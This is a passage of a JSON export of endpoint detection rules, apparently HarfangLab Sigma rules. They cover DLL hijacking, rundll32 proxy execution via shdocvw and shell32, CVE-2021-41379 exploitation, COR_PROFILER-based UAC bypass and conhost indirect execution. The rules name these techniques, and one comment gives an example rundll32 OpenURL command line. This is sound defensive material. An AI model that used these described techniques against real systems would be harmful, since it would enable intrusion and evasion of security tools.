attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'slidetoshutdown.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\d3d10warp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b7e83940-efa3-49f7-9ff6-2e3ebcd998bd",
"rule_name": "DLL Hijacking via slidetoshutdown.exe",
"rule_description": "Detects potential Windows DLL Hijacking via slidetoshutdown.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8062e3d-4666-40ab-a25b-b63ae6634ee6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072416Z",
"creation_date": "2026-03-23T11:45:34.072418Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072422Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_shdocvw.yml",
"content": "title: Proxy Execution via Shdocvw.dll\nid: b8062e3d-4666-40ab-a25b-b63ae6634ee6\ndescription: |\n Detects a suspicious invocation of Shdocvw.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\n It is recommended to check the content of the target file or URL used with the OpenURL argument and child processes of rundll32 to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/02\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shdocvw\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe shdocvw.dll,OpenURL \"C:\\test\\calc.url\"\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_cmd1:\n CommandLine|contains: ' shdocvw'\n\n selection_cmd2:\n CommandLine|contains:\n - 'OpenURL'\n - '#154' # OpenURL\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8062e3d-4666-40ab-a25b-b63ae6634ee6",
"rule_name": "Proxy Execution via Shdocvw.dll",
"rule_description": "Detects a suspicious invocation of Shdocvw.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\nIt is recommended to check the content of the target file or URL used with the OpenURL argument and child processes of rundll32 to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8077321-e5f1-471d-bdc3-450e9886b68f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624994Z",
"creation_date": "2026-03-23T11:45:34.624996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625000Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379",
"https://github.com/klinix5/InstallerFileTakeOver"
],
"name": "cve_2021_41379_edgesvc.yml",
"content": "title: Edge Updater CVE-2021-41379 Vulnerability Exploited\nid: b8077321-e5f1-471d-bdc3-450e9886b68f\ndescription: |\n Detects the possible exploitation of CVE-2021-41379 on Microsoft Edge Updater.\n This vulnerability exists within the Windows Installer service and can be abused by an attacker to escalate privileges and execute arbitrary code in the context of SYSTEM.\n All unpatched versions of Windows are affected and a proof-of-concept is available publicly.\n It is recommended to analyze the process execution by the Edge Updater binary to determine its legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379\n - https://github.com/klinix5/InstallerFileTakeOver\ndate: 2021/11/25\nmodified: 2025/12/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.privilege_escalation\n - attack.t1068\n - cve.2021-41379\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.EdgeUpdater\n - classification.Windows.Exploit.CVE-2021-41379\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\95.0.1020.44\\elevation_service.exe\n Image: '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\*\\elevation_service.exe'\n # If we cannot read info about the file, we can't verify the signature\n ProcessSha256|contains: '?'\n\n filter_signed:\n - Signed: 'true'\n - Signed: 'false'\n OriginalFileName:\n - 'elevation_service'\n - 'elevation_service.exe'\n Company: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8077321-e5f1-471d-bdc3-450e9886b68f",
"rule_name": "Edge Updater CVE-2021-41379 Vulnerability Exploited",
"rule_description": "Detects the possible exploitation of CVE-2021-41379 on Microsoft Edge Updater.\nThis vulnerability exists within the Windows Installer service and can be abused by an attacker to escalate privileges and execute arbitrary code in the context of SYSTEM.\nAll unpatched versions of Windows are affected and a proof-of-concept is available publicly.\nIt is recommended to analyze the process execution by the Edge Updater binary to determine its legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-11-25",
"rule_modified_date": "2025-12-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8709f31-37a7-4b65-857d-2588fb275282",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628641Z",
"creation_date": "2026-03-23T11:45:34.628643Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628647Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Shell32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_shell32.yml",
"content": "title: Proxy Execution via Shell32\nid: b8709f31-37a7-4b65-857d-2588fb275282\ndescription: |\n Detects the execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\n This binary can be used as a lolbin in order to execute binaries or load DLLs.\n It is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shell32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shell32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'rundll32.exe'\n\n selection_shell32:\n CommandLine|contains|all:\n - 'shell32'\n - ','\n\n selection_args:\n CommandLine|contains:\n - 'Control_RunDLL'\n - 'ShellExec_RunDLL'\n\n # This is handled in the rule 0cd0225c-b3cf-4b13-b578-75c10f83bbb5\n filter_suspicious:\n CommandLine|contains:\n - '\\AppData\\'\n - '\\Temp\\'\n - '%AppData%'\n - '%LocalAppData%'\n - '%Temp%'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n # This is handled in the rule bab5e737-6c2c-4c7b-91d5-2de4b89836fb\n filter_control:\n ParentImage: '?:\\Windows\\System32\\control.exe'\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_legitimate:\n CommandLine|contains:\n - '@screensaver'\n - 'mmsys.cpl,,playback'\n - 'mmsys.cpl,,sounds'\n - 'mmsys.cpl,,recording'\n - 'mmsys.cpl,,{0.0.0.00000000}'\n - '?:\\Windows\\system32\\\\*.cpl'\n - '?:\\windows\\CCM\\\\*.cpl'\n - 
'\\Office??\\MLCFG32.CPL'\n - 'PowerCfg.cpl @0,/editplan:'\n - 'input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}'\n - 'inetcpl.cpl,,0'\n - 'Control_RunDLL desk.cpl,'\n - 'sysdm.cpl,,1'\n - 'Control_RunDLL timedate.cpl'\n - 'Control_RunDLL nusrmgr.cpl'\n - 'Control_RunDLL srchadmin.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\System32\\srchadmin.dll'\n - 'Control_RunDLL appwiz.cpl,'\n - 'Control_RunDLL bthprops.cpl,'\n - 'Control_RunDLL cscui.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\system32\\cscui.dll'\n - 'Control_RunDLL userpassowrds2'\n - 'Control_RunDLL ?:\\windows\\system32\\keymgr.dll'\n - 'Control_RunDLL mmsys.cpl,,'\n\n exclusion_netplwiz:\n CommandLine|contains: 'shell32.dll,Control_RunDLL keymgr.dll'\n ParentImage: '?:\\Windows\\System32\\Netplwiz.exe'\n\n exclusion_oracle:\n CommandLine|startswith: 'runDll32.exe shell32.dll,ShellExec_RunDLL ?:\\tmp\\'\n ParentImage|endswith: '\\Oracle\\BIN\\ifrun60.EXE'\n\n exclusion_cpage:\n ParentImage: '?:\\Program Files (x86)\\CWS\\cpage-launcher\\bin\\CPageExec32.exe'\n\n exclusion_jp2launcher:\n CommandLine: 'rundll32 SHELL32.dll,ShellExec_RunDLL *.pdf'\n ParentImage|endswith: '\\bin\\jp2launcher.exe'\n\n exclusion_jaspersoft:\n CommandLine|startswith: 'rundll32 SHELL32.dll,ShellExec_RunDLL '\n ParentCommandLine|contains|all:\n - '\\bin\\java.exe -Xms'\n - '\\Jaspersoft\\iReport-'\n\n exclusion_java:\n CommandLine: 'rundll32 SHELL32.dll,ShellExec_RunDLL *.pdf'\n ParentImage|endswith: '\\bin\\java.exe'\n ParentCommandLine|contains: ' -Xms'\n\n exclusion_input:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL input.dll'\n - 'RunDll32.exe shell32.dll,Control_RunDLL ?:\\Windows\\system32\\input.dll'\n ParentCommandLine:\n - '?:\\WINDOWS\\system32\\control.exe input.dll'\n - 'ctfmon.exe'\n\n exclusion_onedrive1:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe shell32.dll, ShellExec_RunDLL ?:\\Users\\'\n ParentCommandLine:\n - '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n 
- '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /url:odopen:*'\n - '?:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe /url:odopen:*'\n - '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /url:odopen:*'\n - '/updateInstalled /background'\n exclusion_onedrive2:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe shell32.dll, ShellExec_RunDLL ?:\\Users\\'\n ProcessParentOriginalFileName: 'OneDrive.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_xmind:\n ParentImage: '?:\\Program Files (x86)\\XMind\\XMind.exe'\n\n exclusion_sihost:\n CommandLine: '?:\\WINDOWS\\system32\\rundll32.exe shell32.dll,Control_RunDLL'\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8709f31-37a7-4b65-857d-2588fb275282",
"rule_name": "Proxy Execution via Shell32",
"rule_description": "Detects the execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\nThis binary can be used as a lolbin in order to execute binaries or load DLLs.\nIt is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8b3c0b9-820c-4cbc-bf8f-8e9dc817b174",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618740Z",
"creation_date": "2026-03-23T11:45:34.618742Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618746Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_where.yml",
"content": "title: DLL Hijacking via where.exe\nid: b8b3c0b9-820c-4cbc-bf8f-8e9dc817b174\ndescription: |\n Detects potential Windows DLL Hijacking via where.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'where.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8b3c0b9-820c-4cbc-bf8f-8e9dc817b174",
"rule_name": "DLL Hijacking via where.exe",
"rule_description": "Detects potential Windows DLL Hijacking via where.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8b6c756-7a89-4467-98c8-c1a76e73899f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610691Z",
"creation_date": "2026-03-23T11:45:34.610695Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610702Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://offsec.almond.consulting/UAC-bypass-dotnet.html",
"https://redcanary.com/blog/blue-mockingbird-cryptominer/",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_clr_profiler_environment_variable_modification.yml",
"content": "title: .NET CLR Profiler Changed in User Environment\nid: b8b6c756-7a89-4467-98c8-c1a76e73899f\ndescription: |\n Detects the COR_PROFILER or COR_PROFILER_PATH user environment variable being modified.\n This variable should not normally be defined in the user environment variables.\n This can be related to a UAC bypass on a CLR elevated application (like mmc).\n It is recommended to check the origin and legitimacy of the application performing this modification.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/blue-mockingbird-cryptominer/\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2020/10/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\Environment\\COR_PROFILER'\n - 'HKU\\\\*\\Environment\\COR_PROFILER_PATH'\n filter_empty:\n Details: '(Empty)'\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName:\n - 'HKU\\\\*\\Environment\\COR_PROFILER'\n - 'HKU\\\\*\\Environment\\COR_PROFILER_PATH'\n\n condition: (selection_set and not filter_empty) or selection_rename\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8b6c756-7a89-4467-98c8-c1a76e73899f",
"rule_name": ".NET CLR Profiler Changed in User Environment",
"rule_description": "Detects the COR_PROFILER or COR_PROFILER_PATH user environment variable being modified.\nThis variable should not normally be defined in the user environment variables.\nThis can be related to a UAC bypass on a CLR elevated application (like mmc).\nIt is recommended to check the origin and legitimacy of the application performing this modification.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8e64347-bbc6-4698-b322-4fa2b28bfe9a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627071Z",
"creation_date": "2026-03-23T11:45:34.627073Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627077Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_indirect_command_execution_conhost.yml",
"content": "title: Indirect Command Executed via conhost.exe\nid: b8e64347-bbc6-4698-b322-4fa2b28bfe9a\ndescription: |\n Detects a suspicious execution of legitimate conhost.exe Windows binary, used to provide an interface between the Command Prompt and the Windows Explorer.\n Attackers can proxy the execution of commands through conhost.exe to bypass application control or security solutions.\n It is recommended to analyze the actions performed by the spawned process and to look for other malicious actions on the host.\nreferences:\n - https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/01/21\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\conhost.exe'\n\n exclusion_sshd:\n GrandparentImage|endswith:\n - '\\sshd.exe'\n - '\\sshd-session.exe'\n # C:\\Windows\\system32\\conhost.exe --headless --width 172 --height 14 --signal 0x1f8 -- \"c:\\windows\\system32\\cmd.exe\"\n ParentCommandLine|contains|all:\n - ' --headless '\n - ' --width '\n - ' --height '\n - ' --signal '\n - ' -- '\n\n exclusion_ctfmon:\n Image: '?:\\Windows\\System32\\ctfmon.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_conhost_parent:\n ParentCommandLine:\n # \\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1\n # \\??\\C:\\WINDOWS\\system32\\conhost.exe 0x4\n - '\\\\\\?\\?\\\\?:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\\\?\\?\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n 
CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_terminal:\n # https://devblogs.microsoft.com/commandline/new-experimental-console-features/\n # C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --single-argument https://go.microsoft.com/fwlink/?linkid=2028595\n # C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe --single-argument https://go.microsoft.com/fwlink/?linkid=2028595\n # C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe -osint -url https://go.microsoft.com/fwlink/?LinkId=507549\n # C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe -osint -url https://go.microsoft.com/fwlink/?LinkId=871150\n CommandLine|endswith:\n - ' --single-argument https://go.microsoft.com/fwlink/?linkid=*'\n - ' -osint -url https://go.microsoft.com/fwlink/?LinkId=*'\n\n exclusion_alert:\n Image:\n - '?:\\Program Files (x86)\\LANDesk\\Shared Files\\alert.exe'\n - '?:\\Program Files\\LANDesk\\Shared Files\\alert.exe'\n Signed: 'true'\n Signature: 'Ivanti, Inc.'\n\n exclusion_ibm:\n Image: '*\\Start_Programs\\Windows_*\\acslaunch_win*.exe'\n Signed: 'true'\n Signature: 'International Business Machines Corporation'\n\n exclusion_rdm:\n ProcessGrandparentImage: '?:\\Program Files\\Devolutions\\Remote Desktop Manager\\RemoteDesktopManager.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Devolutions Inc'\n\n # https://github.com/asheroto/winget-install/blob/master/winget-install.ps1#L880\n # https://github.com/Romanitho/Winget-Install\n exclusion_winget:\n - CommandLine:\n - 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File winget-notify.ps1'\n - 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File winget-upgrade.ps1'\n - 'schtasks /run /tn WAU\\Winget-AutoUpdate'\n - ProcessGrandparentImage: '?:\\Program Files\\Winget-AutoUpdate\\ServiceUI.exe'\n\n exclusion_malightingtechnology:\n Image: '?:\\Program 
